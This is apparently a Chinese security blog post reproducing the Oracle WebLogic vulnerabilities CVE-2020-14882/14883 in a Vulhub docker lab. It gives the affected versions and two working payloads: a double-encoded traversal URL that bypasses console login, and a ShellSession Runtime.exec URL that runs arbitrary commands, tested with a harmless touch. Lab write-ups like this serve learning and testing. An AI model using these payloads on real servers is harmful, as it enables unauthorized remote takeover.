「配枪朱丽叶。」 「配枪朱丽叶。」
  • 🏠 INDEX
  • 🚩 CTF
    • WEB
    • CRYPTO
    • MISC
  • 🌐 SITE
    • BUUCTF
    • XCTF
    • CTF.SHOW
    • BMZCTF
    • VULNHUB
    • BUGKU
    • HACKTHEBOX
  • 📔 NOTE
  • 👩‍💻 ABOUT ME
  • 💬 COMMENT
  • 🏠 INDEX
  • 🚩 CTF
    • WEB
    • CRYPTO
    • MISC
  • 🌐 SITE
    • BUUCTF
    • XCTF
    • CTF.SHOW
    • BMZCTF
    • VULNHUB
    • BUGKU
    • HACKTHEBOX
  • 📔 NOTE
  • 👩‍💻 ABOUT ME
  • 💬 COMMENT
我的主页 › 笔记 › [Vulhub]CVE-2020-14882/14883 Weblogic 未授权命令执行漏洞复现2 min read
#笔记#

[Vulhub]CVE-2020-14882/14883 Weblogic 未授权命令执行漏洞复现2 min read

2月前
45 0
内容 隐藏
0x00 漏洞描述
0x01 影响版本
0x02 漏洞复现

0x00 漏洞描述

WebLogic是美国Oracle公司的主要产品之一,是商业市场上主要的 J2EE 应用服务器软件,也是世界上第一个成功商业化的J2EE应用服务器,在 Java 应用服务器中有非常广泛的部署和应用。CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台,CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。组合利用CVE-2020-14882/CVE-2020-14883可使未经授权的攻击者绕过WebLogic后台登录等限制,最终远程执行代码接管WebLogic服务器,利用难度极低,风险极大。

0x01 影响版本

  • Oracle Weblogic Server 10.3.6.0.0
  • Oracle Weblogic Server 12.1.3.0.0
  • Oracle Weblogic Server 12.2.1.3.0
  • Oracle Weblogic Server 12.2.1.4.0
  • Oracle Weblogic Server 14.1.1.0.0

0x02 漏洞复现

使用Vulhub的漏洞平台进行复现。

docker-compose up -d

docker搭建好后,访问[ip]:[port]/console显示后台登陆界面,搭建成功。

通过未授权访问漏洞可直接绕过验证进入后台。Payload:

http://[ip]:[port]/console/images/%252E%252E%252Fconsole.portal

注:这里的%252e%252e%252f即二次编码过后的../。

此时的权限很低。我们已经成功复现了CVE-2020-14882,接下来结合它复现一哈CVE-2020-14883,达到任意代码执行的目的。

首先我以交互终端形式进入该容器,查看/tmp文件夹下的内容。

Payload:

/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27你想执行的命令%27);%22);

我执行了touch /tmp/shawroot123,页面显示404:

但是实际上命令成功执行了:

0 0
Shaw Root
# 漏洞复现
相关文章
[HackTheBox]Passage靶机通关记录
PHP反序列化与SESSION学习笔记
[Vulnhub]CyberSploit: 1靶机通关记录
《诸神之眼: Nmap网络安全审计技术揭秘》读书笔记(二)
《诸神之眼: Nmap网络安全审计技术揭秘》读书笔记(一)
头像
Shaw Root站长
> 前路仍有明月共爱河。
131文章 0评论 127获赞
随便看看:)
[CTF.SHOW]WEB命令执行(29-40)
4月前
[INSHack2018]Self Congratulation
10月前
[2016“湖湘杯”]简单的RSA
9月前
[GXYCTF2019]BabyUpload
11月前
[MRCTF2020]Ezaudit
9月前
  • 旧站
  • 我的知乎
  • Riro
  • 7i4n2h3n9
  • EDS
  • 熵增
  • 紫哥purplet
  • 夏风
  • N0vice
  • Ga1@xy
  • prontosil
  • FzWjScJ
  • Retr_0
  • L1near
  • 1p0ch
  • β-AS
  • Match
  • Dizzyk
  • Y1ng
  • 偏有宸机
  • Van1sh
  • Fstone
  • Kali’s Blog
  • Airtail
  • False
Copyright © 2020-2021 「配枪朱丽叶。」. Designed by nicetheme. 百度统计 载入天数... 载入时分秒...